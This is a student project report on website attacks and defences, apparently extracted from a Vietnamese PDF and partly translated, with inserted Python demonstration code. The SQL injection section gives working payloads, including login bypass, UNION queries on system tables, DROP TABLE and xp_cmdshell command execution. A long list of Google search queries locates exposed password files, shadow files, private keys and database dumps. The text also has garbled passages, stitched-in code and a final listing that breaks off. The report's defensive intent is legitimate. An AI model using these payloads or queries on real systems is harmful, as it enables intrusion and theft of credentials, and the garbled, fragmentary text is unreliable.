8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
1/98
MINISTRY OF INDUSTRY AND TRADE
CAO THANG TECHNICAL COLLEGE
FACULTY OF ELECTRONICS AND INFORMATICS
PROJECT:
A STUDY OF WEBSITE ATTACKS AND SECURITY
Supervisor: Ms. Nguyen Thi Thanh Thuan
Students:
Duong Hoang Dai, student ID: 306081018
Nguyen Tuan Dat, student ID: 306081020
Web Programming course project. Topic: A study of website attacks and security
Supervisor's comments:
Table of contents
I. General introduction .................................................................... page 04
II. Some ways of attacking websites ...................................... page 11
1. Exploiting SQL Injection flaws ............................................... page 11
2. Using the Google search engine ........................... page 17
3. Using inline JavaScript ............................................. page 25
4. DDOS .............................................................................. page 28
III. Some ways of securing a website ........................................ page 29
1. SSL (Secure Socket Layer) ............................................. page 29
2. Tools for surveying a web server and finding its flaws .............. page 71
* Super Scan ................................................................... page 75
* SNIFFER ....................................................................... page 78
* CAIN .............................................................................. page 81
IV. Conclusion ................................................................................. page 98
I. General introduction to websites
Before looking into website attacks and security, let us first ask: what is a website, and how does it work?
A website is a network address of the form http://www.companyname.com or http://www.companyname.com.vn. It contains many web pages presenting hypertext content such as images, sound, flash and one or more functions, and it is programmed in some language, for example HTML, C# or PHP. A website is opened with a browser installed on your computer, for example Internet Explorer, Google Chrome or Opera.
Websites are usually divided into two kinds:
- Static websites: websites without a database, consisting only of pages that the designer builds with web authoring software. They suit content with a complex presentation and high graphical demands whose content changes rarely; updating such a site has to be done by specialists, and they are hard to attack.
- Dynamic websites: websites with a database, built by professional design companies, which hand over the tools for managing and updating the site to the customer. Updating is simple and convenient. Information on the site is updated regularly and the amount of information is not limited.
A web page is one page within a website, with an address such as http://www.companyname.com/example.html, where example.html is the name of the page.
Domain name: the domain name is the website's address, and every website must have one. Domain names take many forms, such as www.abc.com, www.abc.net or www.abc.com.vn... Some websites do not buy their own domain but use a sub-domain of the form www.abc.com/xyz. Using such a sub-domain
costs nothing to buy; in principle the parent site (that is, www.abc.com) simply gains a few hundred or a few thousand such sub-domains.
Hosting: for web pages to appear when someone visits them, they must be stored on a computer (a server) that is always running and connected to the Internet. If that computer fails or is switched off at some moment, nobody can reach the websites stored on it during that time. Depending on its needs, a business can buy hosting with a capacity of 10MB (that is, holding at most 10MB of data), 20MB, 50MB, 100MB or more. Hosting is cheap today, from a few tens of thousands to one or two hundred thousand dong per month.
Hacker/Hacking: hackers are people who like to study security on the Internet and practise by breaking into websites that have security weaknesses. In general, no website in the world can claim to be absolutely secure. A hacker can hijack a website's domain name, change the website's content, or flood it with requests (commands that make the server work) so that the website is paralysed for a period of time. A business should ask its hosting provider what recovery policy it has for such events.
So a website needs a domain name (Domain), a place to store its pages (Hosting) and a database (Database), all permanently connected to the Internet.
What is website security? Why do we need to secure a website?
Website security means using website security tools to keep your website safe, blocking as far as possible the attacks of hackers who want to break in and vandalise it or steal the confidential information it holds, and keeping the database safe.
Why does a website's database need protecting? A website's database is a very important part of a company; losing it seriously affects the company's operations. For example: company abc
has the website abc.com.vn; a hacker attacks it and rewrites the site's data into that of another company. People who want to contact the company through the website will be disappointed in it because its website was hacked, which damages the company's reputation, not to mention the hackers handing the company's financial information or projects to competing companies, causing it financial loss.
Owning a website is therefore risky for a company. So why does every company have a website of its own? Here are some reasons:
1. Establishing a presence
Roughly 300 million people in the world access the Internet, and that number grows every day. Reaching even 1% of this group of customers is a success for a business. To be a significant part of the community, and to show them that you care about serving it, you need to be present on the Internet. Be aware that your competitors are doing the same.
2. Making full use of opportunities for contact
Business is often understood simply as communicating with customers. Every shrewd businessperson understands that "the secret of success lies not in what you know but in which customers you know". Businesspeople want to turn ordinary meetings into profitable business, and exchanging business cards is valued in that process. But what happens when a business has to meet thousands, even millions, of partners; can a business be in contact with all its customers at once? This is solved very simply, at any time, anywhere, at any moment, through web pages on the Internet.
3. Creating a ready source of information for partners
When you want to create information or advertising pages, you might place them in advertising sections or the yellow pages, but time will make you reconsider. How can an interested customer contact you immediately? How will payment work for each service? Yellow-pages advertising struggles with this, and it remains a medium that keeps its distance. Today information has to be faster and more interactive. The Internet lets you achieve this
through information pages maintained continuously 24 hours a day, 7 days a week. Customers can read about your business whenever they want, even while you are asleep.
4. Serving customers efficiently
Internet technology gives your business more ways to serve customers. Do you have staff answering the telephone to take customer requests and give them the service information they need? Can customers look up your database themselves and search for the information about your services that they want? Customers can do all of this simply and quickly through your business's own website.
5. Attracting public attention
You will hardly persuade magazines to run a story about you opening a new shop, but you can persuade them to run one if your website's name and new pages are interesting. With such coverage, any Internet user can visit the website to learn about your business and may become a potential customer.
6. Publishing information at any time
What if you need to publish documents before midnight? Suppose it is urgent news, or the prizes of a promotion... If you send such news to newspapers you run into a timing problem: your information is released only when the paper is, and cannot be changed once the paper is out. With the Internet you can change the news on your business's website within seconds; the latest information is updated and delivered to the people waiting for it without going through any intermediary.
7. Selling goods
The Internet gives your business a big opportunity to sell goods. The growth of the Internet worldwide has brought a new and promising market of customers: the community of Internet users. Should you hesitate while your competitors are step by step entering and capturing market share on the Internet?
8. Presenting products vividly
If your products are machines, customers are truly convinced when they see how they work. The Internet opens many ways to present products vividly to customers through the website, with images, sound and short videos, which will bring more potential customers to you; no brochure can do as much.
9. Reaching a high-income public
The number of people on the Internet can form the largest ready-made market. Internet users tend to be educated, knowledgeable people with stable positions and high incomes. Reaching and capturing this market is therefore something every business wants to achieve.
10. Answering frequently asked questions
Anyone who answers the telephone in your company will tell you that they spend most of their time answering almost the same questions. These are the questions customers want to ask before they do business with you. Putting these questions on the website removes barriers to doing business and frees up time for the telephone staff.
11. Handling internal information
Travelling sales staff may need information updated by the minute to help them sell and keep business steady. If you know what information is needed, you can put it on a separate website. With one Internet connection through a local telephone call, your sales staff anywhere in the world get the most complete information without paying long-distance charges, and office staff are not burdened further.
12. Expanding into the international market
In ordinary business you cannot mail, telephone or send your terms to every potential customer on the world market, but with a website you can talk directly to an international customer as if they were local. When your business has representative offices abroad, they can reach the head office's information at the cost of a local telephone call.
13. Forming a 24-hour service
We do not all work to the same schedule. Business happens everywhere and at all times, not only during office hours. When business is being done between Europe and Asia, the time difference is a major obstacle. Websites serve your customers and partners 24 hours a day, 7 days a week. Customers can choose the information they need and consider important, and that is what keeps you ahead of the competition even when you are out of the office.
14. Changing current information quickly
Some information changes before it is even printed, and you end up with a pile of documents, valid and invalid, mixed together. Electronic publications can be changed as you need, without paper, ink or invoices. You can also connect your business's website to a database that you can change as many times a day as you like. No paper can give you that flexibility.
15. Receiving feedback from customers
With a website you can ask customers for feedback immediately, while they are visiting your site. This saves a great deal of time and money when planning advertising and business strategies, based on information gathered from customers at no extra cost. A customer's answer is put on the website as they explore the product and is forwarded at once to your e-mail address.
16. Testing new services and products on the market
When launching a new product, every business has to advertise and present it. With traditional advertising this is a very expensive stage that needs a large budget. But if you present and advertise the new product on your business's website, you will know what to expect from the customers who visit it; they are the cheapest market you can reach. They can also tell you what they think of your product fastest and most easily, at a lower cost than any other market you reach.
17. A flexible communication medium
Today the Internet is rated the most professional transmission system, because its main product is information that is reached easily, quickly and cheaply. Publications transmitted over the Internet are becoming ever more common because all the work is done in a digital environment drawing on many information sources. All of this is done easily through the pages of your business's own website.
18. Reaching a young and educational market
Most universities give students Internet access, and secondary-school pupils will gradually get to know and use Internet services in the coming years. Demand for books, sportswear, courses, decorative items and much else will become the diverse demand of the Internet market. Even as e-commerce services are adopted and the average age rises somewhat, the under-25 market segment will keep growing.
19. Reaching a professional market
The Internet is not just computers; it is a place where people can buy, sell and exchange anything from toothbrushes and works of art to English lessons... With 70 million regular users and that number growing daily, your business information can be presented to a very large number of people.
20. Serving the local market
We have talked about the power of serving demand on the international market through the Internet, but what about the market right in your own locality? The answer is that local customers, through marketing activities, will learn of the website, access its information on the Internet and bring profit to your company. So wherever the company is, potential customers still know of you through the Internet and you will be ready to serve them.
II. Some ways of attacking websites
1. Exploiting SQL injection flaws
1.1 What is SQL Injection?
When deploying web applications on the Internet, many people still think that keeping them safe and secure, so as to minimise the chance of attack by hackers, is simply a matter of choosing the operating system, the database management system, the web server that will run the application, and so on, forgetting that the application running on that stack can itself contain a very serious security hole. One of these holes is SQL injection. In Vietnam, the time when website administrators worried about scanning for viruses and applying patches for system software has passed, but looking after flaws in the applications themselves receives very little attention. That is why, recently, quite a few websites in Vietnam have been attacked, most of them through SQL injection [1]. So what is SQL injection?
SQL injection is a technique that lets attackers exploit weaknesses in the input validation of web applications, together with the error messages of the database management system, to "inject" and execute illegitimate SQL statements (ones the application developer did not anticipate). The consequences are severe, because it lets attackers delete and modify data, having full control over the application's database and even the server it runs on. The flaw commonly occurs in web applications whose data is managed by a database management system such as SQL Server, MySQL, Oracle, DB2 or Sybase.
1.2. Kinds of SQL Injection attack
There are four common kinds: bypassing the login check (authorization bypass), using the SELECT statement, using the INSERT statement, and using stored procedures [2], [3].
Attacks that bypass the login check
With this kind of attack, hackers can easily get past login pages thanks to flaws in the way SQL statements are used to operate on the web application's database.
Consider a typical example. To let users reach protected pages, a system usually builds a login page that asks the user for a username and password. Once the user has entered them, the system checks whether the username and password are valid and decides whether to let the user continue.
In this case one can use two pages: an HTML page that displays the input form and an ASP page that processes the user's input. For example:
execlogin.asp
login.htm
Username:
Password:
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
13/98
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
14/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
14
cho mt gi trkhc, v t, khi u cho mt cuc tn cng bt hp php,v dnh: 0 OR 1=1(ngha l, http://www.myhost.com/shownews.asp?ID=0or 1=1).
Cu truy vn SQL lc ny s tr v tt ccc article t bng d liu v
n s thc hin cu lnh:SELECT * FROM T_NEWS WHERE NEWS_ID=0 or 1=1
Mt trng hp khc, v dnh trang tm kim. Trang ny cho phpngi dng nhp vo cc thng tin tm kim nh H, Tn, on mthng gp l:
Tng tnh trn, tin tc c th li dng s htrong cu truy vn SQL nhp vo trng tn tc gi bng chui gi tr:
' UNION SELECT ALL SELECT OtherField FROM OtherTable WHERE''=' (*)
Lc ny, ngoi cu truy vn u khng thnh cng, chng trnh sthc hin thm lnh tip theo sau tkha UNION na.
Tt nhin cc v dni trn, dng nh khng c g nguy him, nhnghy thtng tng k tn cng c thxa ton bc s d liu bng cchchn vo cc on lnh nguy him nh lnh DROP TABLE. V d nh: '
DROP TABLE T_AUTHORS -Chc cc bn s thc mc l lm sao bit c ng dng web b li
dng ny c. Rt n gin, hy nhp vo chui (*) nh trn, nu h thngbo li vc php dng: Invalid object name OtherTable; ta c th bit chcl h thng thc hin cu SELECT sau tkha UNION, v nh vy mi cth tr v li m ta ctnh to ra trong cu lnh SELECT.
Cng sc thc mc l lm thno c th bit c tn ca cc bngd liu m thc hin cc thao tc ph hoi khi ng dng web b li SQLinjection. Cng rt n gin, bi v trong SQL Server, c hai i tng l
sysobjects v syscolumns cho php lit k tt ccc tn bng v ct c trongh thng. Ta chcn chnh li cu lnh SELECT, v d nh:
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
15/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
15
' UNION SELECT name FROM sysobjects WHERE xtype = 'U' lists the names of all the tables.
Attacks using the INSERT statement
Web applications usually let users register an account in order to take part. An essential feature is that after registering successfully, users can view and edit their own information. SQL injection can be used when the system does not validate the information entered. For example, an INSERT statement may have the form INSERT INTO TableName VALUES('Value One', 'Value Two', 'Value Three'). If the code that builds the SQL statement has the form:
then it certainly has a SQL injection flaw, because if we enter into the first field, for example, ' + (SELECT TOP 1 FieldName FROM TableName) + ', the query becomes: INSERT INTO TableName VALUES(' ' + (SELECT TOP 1 FieldName FROM TableName) + ' ', 'abc', 'def'). When the information is later displayed, it is as if you had asked for one more statement to be executed: SELECT TOP 1 FieldName FROM TableName
Attacks using stored procedures
Attacks through stored procedures do great damage if the application runs with the system administrator account 'sa'. For example, if we change the injected code to: ' ; EXEC xp_cmdshell cmd.exe dir C: ', the system will run a command listing the directories on the server's C:\ drive. What kind of damage is done depends on the command placed after cmd.exe.
1.3. Prevention
So SQL injection exploits the carelessness of web application developers when handling input data used to build SQL statements. The damage depends on the environment and how the system is configured. If the application uses the dbo role (the database owner's rights) when working with data, it can delete all the tables, create new tables, and so on. If the application uses the sa role (system administrator rights), it can control the whole database management system, and with such broad rights it can create illegitimate user accounts to take control of your system. To prevent this, we can act at two levels:
1.3.1. Strict control of input data
To guard against the possible risks, protect SQL statements by strictly checking all input received from the Request object (Request, Request.QueryString, Request.Form, Request.Cookies and Request.ServerVariables). For example, limit the length of input strings, or write an EscapeQuotes function that replaces each single quote with two single quotes, like this:
When the input is supposed to be a number, the flaw comes from replacing a value expected to be numeric with a string containing an illegitimate SQL statement. To avoid this, simply check that the data has the right type with the IsNumeric() function.
One can also write a function that strips certain dangerous characters and keywords, such as ;, --, select, insert, xp_, ..., from the user's input string to limit this kind of attack:
1.3.2. Secure configuration of the database management system
There must be strict control and limits on the data-handling rights of the user account the web application uses. Ordinary applications should avoid using rights such as dbo or sa. The more restricted the rights, the less the damage.
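The login-bypass and numeric-ID injections of section 1.2, followed by the EscapeQuotes and IsNumeric checks of section 1.3.1, worked through against a throwaway SQLite database. This is an added example in Python and not the report's own ASP listings; the tables T_USERS and T_NEWS, their rows and the helper names are constructed for the demonstration, and the parameterised queries go beyond what the report describes.

```python
"""Added example (not the report's ASP code): the login-bypass and numeric-ID
injections of section 1.2 against a throwaway SQLite database, then the
report's EscapeQuotes and IsNumeric countermeasures from 1.3.1, and finally
a parameterised query. Table names, columns and rows are constructed."""
import re
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data: two users and three news articles.
    Passwords are stored in clear only to keep the injection demo short;
    a real application stores password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE T_USERS(USERNAME TEXT, PASSWORD TEXT);
        INSERT INTO T_USERS VALUES ('alice', 's3cret'), ('bob', 'hunter2');
        CREATE TABLE T_NEWS(NEWS_ID INTEGER, TITLE TEXT);
        INSERT INTO T_NEWS VALUES (1, 'first'), (2, 'second'), (3, 'third');
        """
    )
    return conn


def login_concat(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable: the statement is assembled by string concatenation, so a
    quote in either field changes the SQL itself (the 1.2 login bypass)."""
    sql = ("SELECT COUNT(*) FROM T_USERS WHERE USERNAME='" + username
           + "' AND PASSWORD='" + password + "'")
    return conn.execute(sql).fetchone()[0] > 0


def escape_quotes(value: str) -> str:
    """The report's EscapeQuotes idea: double every single quote so the input
    stays inside its string literal."""
    return value.replace("'", "''")


def login_escaped(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Still concatenation, but every input passes through escape_quotes."""
    sql = ("SELECT COUNT(*) FROM T_USERS WHERE USERNAME='" + escape_quotes(username)
           + "' AND PASSWORD='" + escape_quotes(password) + "'")
    return conn.execute(sql).fetchone()[0] > 0


def login_param(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised query: the driver binds the values, the input never
    becomes part of the SQL text, so no escaping is needed."""
    sql = "SELECT COUNT(*) FROM T_USERS WHERE USERNAME=? AND PASSWORD=?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def show_news_concat(conn: sqlite3.Connection, news_id: str) -> list:
    """Vulnerable shownews.asp?ID=... style query: a numeric field has no
    quotes, so EscapeQuotes would not help here (input '0 or 1=1')."""
    return conn.execute("SELECT TITLE FROM T_NEWS WHERE NEWS_ID=" + news_id).fetchall()


def is_numeric(value: str) -> bool:
    """Stand-in for the report's IsNumeric() check: an unsigned integer only."""
    return re.fullmatch(r"\d+", value) is not None


def show_news_safe(conn: sqlite3.Connection, news_id: str) -> list:
    """Type check first, as 1.3.1 recommends, then bind the integer."""
    if not is_numeric(news_id):
        raise ValueError("NEWS_ID must be numeric")
    return conn.execute("SELECT TITLE FROM T_NEWS WHERE NEWS_ID=?",
                        (int(news_id),)).fetchall()


def rejects_non_numeric(conn: sqlite3.Connection, news_id: str) -> bool:
    """True when show_news_safe refuses the value, i.e. the attempt is stopped."""
    try:
        show_news_safe(conn, news_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    tamper = "' OR ''='"          # the WHERE ''=' trick from section 1.2
    print("concat  :", login_concat(db, tamper, tamper))   # True: bypassed
    print("escaped :", login_escaped(db, tamper, tamper))  # False
    print("param   :", login_param(db, tamper, tamper))    # False
    print("ID=0 or 1=1 via concat:", len(show_news_concat(db, "0 or 1=1")), "rows")
    print("ID=0 or 1=1 via safe  :", rejects_non_numeric(db, "0 or 1=1"))
```

EscapeQuotes-style quoting only protects string fields, which is why show_news_safe checks the type of the numeric ID and then binds it as a parameter instead of concatenating it; the keyword blacklist that section 1.3.1 also mentions is not shown, because parameter binding removes the need for it and blacklists are easy to get wrong.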
Also, to avoid SQL injection risks, take care to remove any technical information from the messages sent to the user when the application fails. Ordinary error messages reveal technical details that can let an attacker learn the system's weak points.
References
[1]. List of websites with SQL injection flaws: http://www.security.com.vn/
[2]. SQL Injection FAQ: http://www.sqlsecurity.com/DesktopDefault.aspx?tabindex=2&tabid=3
[3]. Advanced SQL Injection: http://www.nextgenss.com/papers/advanced_sql_injection.pdf
[4]. Preventing SQL Injection: http://www.owasp.org/asac/input_validation/sql.shtml
[5]. SQL Injection Attacks - Are You Safe? http://www.sitepoint.com/article/794
2. Using the Google search engine
Google is the most powerful and popular search engine in the world; it accepts predefined commands typed into it and returns astonishing results. This lets malicious users such as hackers, crackers, script kiddies and so on use Google to gather secret and sensitive information that cannot be seen through ordinary searches. With the advanced search syntax one can find flawed sites or servers that are easy to attack.
Advanced search syntax for Google
[intitle:]
Makes Google restrict results to pages containing the given word in the title. For example, intitle: login password (without quotation marks) returns links to pages with the word "login" in the title and the word "password" somewhere in the page.
Similarly, to query for more than one word in the page title, use allintitle: instead of intitle: to get pages that contain all of those words in the title. For example, intitle: login intitle: password is the same as the query allintitle: login password.
Some common intitle queries:
intitle:"Index of" service.pwd
    Directory listing contains service.pwd file(s)
intitle:"Index of" view-source
    Directory listing contains view-source file(s)
intitle:"Index of" admin
    Directory listing contains administrative files or directories
intitle:"Index of" .htpasswd
    Directory listing contains .htpasswd file!
intitle:"Index of" log.txt
    Directory listing contains log text files
intitle:"Index of" stats.html
    Directory listing contains stats.html which may contain useful web server statistics
"access denied for user" "using password"
    Web page contains error message which might provide useful application information
"A syntax error has occurred" filetype:ihtml
    Web page contains error message which might provide useful application information
"ORA-00921: unexpected end of SQL command"
    Web page contains error message which might provide useful application information
inurl:passlist.txt
    The passlist.txt file may contain user passwords
"Index of /backup"
    Directory may contain sensitive backup files
intitle:"Index of" .bash_history
    Directory listing contains bash history information
intitle:"Index of" index.html.bak
    Directory listing contains backup index file (index.html.bak)
intitle:"Index of" index.php.bak
    Directory listing contains backup index file (index.php.bak)
intitle:"Index of" guestbook.cgi
    Directory listing contains backup index file (index.html.bak)
intitle:"Test Page for Apache"
    Default test page for Apache
intitle:index.of.etc
    Directory listing of /etc ?
filetype:xls username password
    XLS spreadsheet containing usernames and passwords?
"This file was generated by Nessus"
    Nessus report!
intitle:"Index of" secring.bak
    Secret key file
intitle:"Terminal Services Web Connection"
    Access terminal services!
intitle:"Remote Desktop Web Connection"
    Access Remote Desktop!
intitle:"Index of" access_log
    Directory listing contains access_log file which may store sensitive information
intitle:"Index of" finance.xls
    Directory listing contains finance.xls which may contain sensitive information
intitle:"Usage Statistics for"
    Statistical information may contain sensitive data
intitle:"Index of" WSFTP.LOG
    WSFTP.LOG file contains information about FTP transactions
intitle:"Index of" ws_ftp.ini
    Directory listing contains password file(s)? The ws_ftp.ini file may contain usernames and passwords of FTP users
"not for distribution" confidential
    URL may contain confidential or sensitive information
"phpMyAdmin" "running on" inurl:"main.php"
    phpMyAdmin allows remote mysql database administration
"#mysql dump" filetype:sql
    mysql database dumps
"This summary was generated by wwwstat"
    Database statistics
"Host Vulnerability Summary Report"
    Vulnerability report!
"Network Vulnerability Assessment Report"
    Vulnerability report!
inurl:php.ini filetype:ini
    The php.ini file may contain sensitive PHP environment details.
BEGIN (CERTIFICATE|DSA|RSA) filetype:key
    Private key(s)!
BEGIN (CERTIFICATE|DSA|RSA) filetype:csr
    Private key(s)!
BEGIN (CERTIFICATE|DSA|RSA) filetype:crt
    Private key(s)!
intitle:"Index of" passwd passwd.bak
    passwd file!
intitle:"Index of" master.passwd
    master.passwd file!
intitle:"Index of" pwd.db
    pwd.db file may contain password information
intitle:"Index of..etc" passwd
    passwd file!
filetype:cfg ks intext:rootpw -sample -test -howto
    This file may contain the root password (encrypted)
intitle:"index.of.personal"
    Directory may contain sensitive information
intitle:"Index of" login.jsp
    The login.jsp file may contain database username or password information
intitle:"Index of" logfile
    Directory may contain sensitive log files
filetype:php inurl:"viewfile" -"index.php" -"idfil
    File may contain PHP source code
allinurl:intranet admin
    Page may contain sensitive information
"supplied argument is not a valid MySQL result resource"
    mysql error message may reveal sensitive information
"Error Diagnostic Information" intitle:"Error Occurred While"
    Error message may reveal sensitive information
HTTP_USER_AGENT=Googlebot
    Page may contain sensitive environment details
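A defender-side check, added here as an example and not part of the original report: it walks a site's own web root and flags the kinds of files the queries listed above look for (backup copies, password and log files, private keys, database dumps), together with directories that have no index file and so may show a listing, so that they can be removed before a crawler indexes them. The pattern list is drawn from the queries above; the sample tree, the set of index-file names and the reason strings are constructed assumptions.

```python
"""Added example (not from the report): a defender-side sweep of a site's own
web root for the kinds of files the report's Google queries look for, so
they can be removed before a crawler indexes them. Pattern list drawn from
the queries above; sample tree, index-file names and reasons are assumptions."""
import fnmatch
import os
import shutil
import tempfile

# Filename patterns taken from the intitle:/inurl:/filetype: queries above.
SENSITIVE_PATTERNS = {
    "service.pwd": "web server password file",
    ".htpasswd": "Apache basic-auth password file",
    ".bash_history": "shell history",
    "*.bak": "backup copy of a page (may expose source)",
    "log.txt": "log file",
    "access_log": "web server access log",
    "WSFTP.LOG": "FTP transaction log",
    "ws_ftp.ini": "FTP client config (may hold credentials)",
    "passlist.txt": "password list",
    "passwd": "passwd file",
    "master.passwd": "master.passwd file",
    "pwd.db": "password database",
    "secring.bak": "PGP secret keyring backup",
    "php.ini": "PHP environment configuration",
    "*.key": "private key",
    "*.csr": "certificate signing request",
    "*.sql": "database dump",
    "*.xls": "spreadsheet (check for credentials)",
}

# Assumed set of names a web server serves instead of a directory listing.
INDEX_FILES = {"index.html", "index.htm", "index.php", "index.jsp",
               "index.asp", "default.htm", "default.asp"}


def scan_webroot(root: str) -> list:
    """Return sorted (relative path, reason) pairs: every file matching a
    sensitive pattern, plus every directory with no index file, which a
    server configured for directory listing would expose."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        if not any(f.lower() in INDEX_FILES for f in filenames):
            findings.append((rel_dir, "no index file: directory listing may be exposed"))
        for name in filenames:
            for pattern, reason in SENSITIVE_PATTERNS.items():
                if fnmatch.fnmatch(name.lower(), pattern.lower()):
                    rel_file = os.path.relpath(os.path.join(dirpath, name), root)
                    findings.append((rel_file, reason))
                    break  # first matching pattern is enough
    return sorted(findings)


def build_sample_webroot() -> str:
    """Constructed sample tree for the demo; returns its path."""
    root = tempfile.mkdtemp(prefix="webroot_")
    files = {
        "index.html": "<html>home</html>",
        "about.html": "<html>about</html>",
        "index.html.bak": "<?php echo 'old'; ?>",
        "admin/.htpasswd": "admin:$apr1$xyz",
        "admin/index.php": "<?php ?>",
        "backup/site.sql": "-- mysql dump",
        "ssl/server.key": "-----BEGIN RSA PRIVATE KEY-----",
        "img/logo.png": "png",
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    sample = build_sample_webroot()
    try:
        for path, reason in scan_webroot(sample):
            print(f"{path:25} {reason}")
    finally:
        shutil.rmtree(sample)
```

Run it against the real document root of a server you operate; a directory flagged for having no index file is only a listing candidate, since whether the server actually lists it depends on its configuration, but the flagged files themselves should not be under a web root at all.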
[ inurl: ]
The inurl: syntax restricts results to URLs containing the search keyword. For example, inurl: passwd (without quotation marks) returns links to pages with the word "passwd" in the URL. Similarly, to query for more than one word in the URL, use allinurl: instead of inurl: to get URLs containing all the search keywords. For example, allinurl: etc/passwd searches for URLs containing both etc and passwd. Google ignores the slash (/) between the words.
[ site: ]
The site: syntax restricts Google to the given keywords within a particular site or domain. For example, exploits site:hackingspirits.com (without quotation marks) searches for the keyword exploits in the pages reachable through all the links of the domain hackingspirits.com. There is no space between site: and the domain name.
[ filetype: ]
The filetype: syntax restricts Google to files on the Internet with a particular extension (for example doc, pdf or ppt, etc.). For example, filetype:doc site:gov confidential (without quotation marks) searches for files with the .doc extension in all government domains with the .gov extension that contain the word confidential in the page or in the .doc file. For example:
. Kt qu s bao gm nhng lin kt n tt ccc file vn bn b trn ccsite ca chnh ph.
[ link: ]
The link: operator lists the web pages that have links to the given page. For example, the query link:SecurityFocus lists pages that link to the SecurityFocus home page. Note that there is no space between "link:" and the URL of the page.
[ related: ]
The related: operator lists pages that are "similar" to the given page. For example, related:www.securityfocus.com lists pages similar to the Securityfocus home page. Remember that there is no space between "related:" and the URL of the page.
[ cache: ]
The cache: query returns the version of the page that Google has stored. For example, cache:Hackingspirits brings up the copy of the page cached by Google. Remember that there is no space between "cache:" and the URL of the page. If you include other words in the query, Google highlights those words in the cached text. For example, cache:Hackingspirits guest returns the cached text with the word "guest" highlighted.
[ intext: ]
The intext: operator searches for words within a particular website. It ignores links, URLs and page titles. For example, intext:exploits (without quotation marks) returns links to pages whose content contains the search term "exploits".
[ phonebook: ]
phonebook searches for US street addresses and telephone numbers. For example, phonebook:Lisa+CA lists everyone with Lisa in their name who lives in California (CA). This operator can be an excellent tool for an attacker who wants to look up personal information for social engineering.
Querying vulnerable sites or servers with Google's advanced operators
Use the "Index of" syntax to find sites that allow directory browsing. The following are a few examples used to reach a great deal of sensitive information far more easily:
Index of /admin
Index of /passwd
Index of /password
Index of /mail
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
"Index of /secret"
"Index of /confidential"
"Index of /root"
"Index of /cgi-bin"
"Index of /credit-card"
"Index of /logs"
"Index of /config"
Searching for vulnerable sites or servers with inurl: or allinurl:
a. Using allinurl:winnt/system32/ (without quotation marks) lists all links to servers that allow restricted directories such as system32 to be reached over the web. If you are lucky, you may get access to the file cmd.exe in the system32 directory. Once you can reach cmd.exe and execute it, you can go further, escalate your privileges across the server and compromise it.
b. Using allinurl:wwwboard/passwd.txt (without quotation marks) in Google search lists all links to servers that are exposed to the WWWBoard password vulnerability. To learn more about this vulnerability you can visit the following link: http://www.securiteam.com/exploits/2BUQ4S0SAW.html
c. Using inurl:.bash_history (without quotation marks) lists all links to servers that allow the file .bash_history to be reached over the web. This is a command-line history file. It holds the list of commands executed by the administrator, and sometimes also sensitive information such as passwords the administrator typed in. If this file is compromised and it contains the encrypted passwords of a Unix (or *nix) system, they can easily be cracked with John the Ripper.
d. Using inurl:config.txt (without quotation marks) lists all links to servers that allow the file config.txt to be reached through the web interface. This file holds sensitive information, including the hashed value of the administrator password and the credentials used for database access. For example, the Ingenium Learning Management System is a web application for Windows systems developed by Click2learn, Inc. Ingenium Learning Management System versions 5.1 and 6.1 store sensitive information insecurely in config.txt. For more information see the following link: http://www.securiteam.com/securitynews/6M00H2K5PG.html
Other similar searches using inurl: or allinurl: combined with other operators:
inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurl:orders.txt
inurl:"wwwroot/*."
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php
inurl:gov filetype:xls "restricted"
index of ftp +.mdb
allinurl:/cgi-bin/ +mailto
Searching for vulnerable sites or servers with intitle: or allintitle:
a. Using [allintitle: "index of /root] (without the square brackets) lists links to web servers that allow restricted directories such as root to be reached through the web interface. This directory sometimes holds sensitive information that can easily be found with simple web requests.
b. Using [allintitle: "index of /admin] (without the square brackets) lists links to websites that allow directory listing of restricted directories such as admin through the web interface. Most web applications use a name like admin to keep administrative functions there. This directory sometimes holds sensitive information that can easily be found with simple web requests.
Other similar searches using intitle: or allintitle: combined with other operators:
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
allintitle: sensitive filetype:doc
allintitle: restricted filetype:mail
allintitle: restricted filetype:doc site:gov
To find sites vulnerable to Cross-Site Scripting (XSS):
allinurl:/scripts/cart32.exe
allinurl:/CuteNews/show_archives.php
allinurl:/phpinfo.php
To find sites vulnerable to SQL Injection:
allinurl:/privmsg.php
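As an added example (not part of the original report), here is a defender's check in Python that runs over web-server access logs and flags requests for the file names the queries above are built to find, separating files the server actually handed out (status 200) from mere probes; the log lines and IP addresses are constructed for the example.

```python
import re
from collections import defaultdict

# Paths and file names that the search queries on this page are built to find.
SENSITIVE_PATTERNS = [
    r"/\.bash_history$", r"/\.sh_history$", r"/passwd(\.txt|\.bak)?$",
    r"/master\.passwd$", r"/pwd\.db$", r"/etc/shadow$", r"/htpasswd$",
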